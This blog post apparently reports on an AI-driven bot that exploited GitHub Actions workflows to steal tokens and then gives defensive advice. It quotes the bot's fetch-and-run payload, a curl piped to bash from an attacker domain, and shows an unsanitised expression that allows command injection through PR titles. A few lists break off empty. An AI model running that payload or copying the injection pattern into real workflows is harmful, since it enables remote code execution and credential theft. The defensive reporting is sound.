← Back to blog
Cloud & DevOps 5 min read

AI Bot "hackerbot-claw" Exploits GitHub Actions: What We Know About the Automated Attack Campaign

Discover how AI bot "hackerbot-claw" automated attacks on GitHub Actions. Learn the exploitation techniques and protect your workflows from this emerging threat.

AI Bot "hackerbot-claw" Exploits GitHub Actions: What We Know About the Automated Attack Campaign

The Rise of Automated GitHub Actions Exploitation

Between February 21-28, 2026, security researchers discovered an AI-powered bot systematically exploiting GitHub Actions workflows. The bot, operating under the name "hackerbot-claw," demonstrated a concerning evolution in attack sophistication: fully automated vulnerability scanning, exploit development, and payload deployment across multiple high-profile repositories.

According to StepSecurity's analysis, the bot forked 5 repositories and opened 12 pull requests across 4 targets within a single week. At least 4 of these attempts resulted in successful arbitrary code execution.

How hackerbot-claw Operates

The bot's README file revealed its core architecture: a vulnerability pattern index containing 9 classes and 47 sub-patterns. This isn't just another script kiddie tool — it's a sophisticated system that autonomously:

Real numbers: The bot's activity log showed 5 successful exploitation sessions in just 2 days before researchers analyzed it.

Every attack delivered an identical payload: curl -sSfL hackmoltrepeat.com/molt | bash. But here's what makes it sophisticated — the bot used different exploitation techniques for each target, adapting its approach based on the repository's specific workflow configuration.

The Anatomy of a Successful Attack

One documented exploitation attempt showcased the bot's persistence. Against a single target, hackerbot-claw iterated 6 times over 18 hours. The first four attempts failed as the target's security measures blocked them.

Key takeaway for business: Attempts 5 and 6 (pull requests #6068 and #6069) succeeded. The "Run quality checks" workflow step that normally takes 30 seconds ran for 5 minutes and 37 seconds — a clear indicator of malicious activity executing in the background.

The attack successfully exfiltrated a GITHUB_TOKEN with write permissions to the contents and pull-requests scopes. With these permissions, an attacker can:

The Technical Innovation: AI-Powered Adaptation

What sets hackerbot-claw apart from traditional automated attacks is its use of AI for exploit customization. The bot doesn't blindly spray the same exploit across thousands of repositories. Instead, it analyzes each target's workflow configuration and selects from its pattern library.

As documented in Aikido Security's research on AI-integrated CI/CD vulnerabilities, the integration of AI into development workflows creates new attack surfaces. When GitHub Actions workflows process untrusted content from issues, pull requests, or commits, they often embed this content directly into prompts sent to AI models.

Put simply: The bot exploits the trust relationship between CI/CD systems and the code they're building. By injecting malicious content into places workflows don't expect it, the bot tricks the system into executing its payload.

Why This Attack Succeeds

Cycode's vulnerability research identified the core vulnerability pattern: workflows that use expressions like ${{github.event.issue.title}} or ${{github.event.pull_request.title}} without proper sanitization create command injection opportunities.

The vulnerable pattern looks innocent:

echo "Processing PR: ${{github.event.pull_request.title}}"

But an attacker can craft a pull request title containing shell metacharacters to break out of the echo command and execute arbitrary code.

Honest take: Most developers assume GitHub Actions expressions are safe because they come from GitHub's API. This assumption is wrong when the data originates from user-controlled sources like issue titles or PR descriptions.

Defense Strategies That Actually Work

Based on our experience with securing CI/CD pipelines across dozens of projects, here's what we recommend:

1. Minimize Token Permissions

Never use the default permissions: write-all. Instead, explicitly declare minimal permissions:

permissions:
  contents: read
  pull-requests: read

2. Sanitize All User Input

Any workflow that processes user-controlled content must sanitize it first. Use GitHub's built-in functions or intermediate steps to clean the data before use.

3. Monitor Workflow Execution Times

Set up alerts for workflows that run significantly longer than their baseline. A 30-second job suddenly taking 5 minutes indicates potential exploitation.

4. Implement the Pull Request Target Pattern Correctly

Many repositories use pull_request_target to access secrets in PR workflows. This is dangerous when combined with checking out untrusted code. Always validate the source before granting elevated permissions.

What This Means for Your Project

The emergence of AI-powered exploitation bots represents a paradigm shift in CI/CD security. Traditional security measures that rely on static rules or pattern matching can't adapt to an attacker that learns and evolves its techniques.

Real numbers: With 47 sub-patterns in its arsenal and the ability to iterate multiple times per target, hackerbot-claw can potentially test hundreds of exploitation variations against a single repository.

Organizations need to rethink their CI/CD security strategy. The days of "set it and forget it" GitHub Actions workflows are over. Every workflow that processes external input needs a security review, and every use of elevated permissions needs justification.

The Bigger Picture

The hackerbot-claw campaign demonstrates that supply chain attacks are evolving from manual, targeted operations to automated, AI-driven campaigns. The bot's ability to achieve code execution across multiple high-profile repositories in under a week shows the scale of the threat.

Here's what we recommend for immediate action:

  1. Audit all workflows using pull_request_target or processing issue/PR content
  2. Implement strict branch protection rules requiring approval for workflow changes
  3. Use tools like StepSecurity or GitHub's own security features to monitor workflow behavior
  4. Train developers on secure GitHub Actions patterns — the syntax might look safe, but the execution context matters

Key takeaway for business: The cost of a compromised CI/CD pipeline extends far beyond the immediate breach. Attackers with write access to your repository can inject backdoors into your software supply chain, affecting every customer who downloads your code. The investment in CI/CD security pays for itself by preventing a single successful attack.

This article is based on publicly available sources and may contain inaccuracies.

Related articles

SqueezeAI
  1. hackerbot-claw is an AI-powered bot that systematically exploits GitHub Actions workflows by autonomously scanning for vulnerabilities, verifying exploitability, and deploying proof-of-concept exploits to steal secrets and access tokens.
  2. The bot adapts its exploitation techniques for each target based on the repository's specific workflow configuration, rather than using a single payload spray approach, making it significantly more effective than traditional automated attacks.
  3. Stolen GITHUB_TOKENs with write permissions allow attackers to push malicious code directly to repositories, merge their own pull requests, and modify release artifacts—giving them complete control over the affected project.
  4. The bot successfully exploited targets through iterative attempts over extended periods, with at least 4 out of 12 documented pull request attempts resulting in arbitrary code execution.

Powered by B1KEY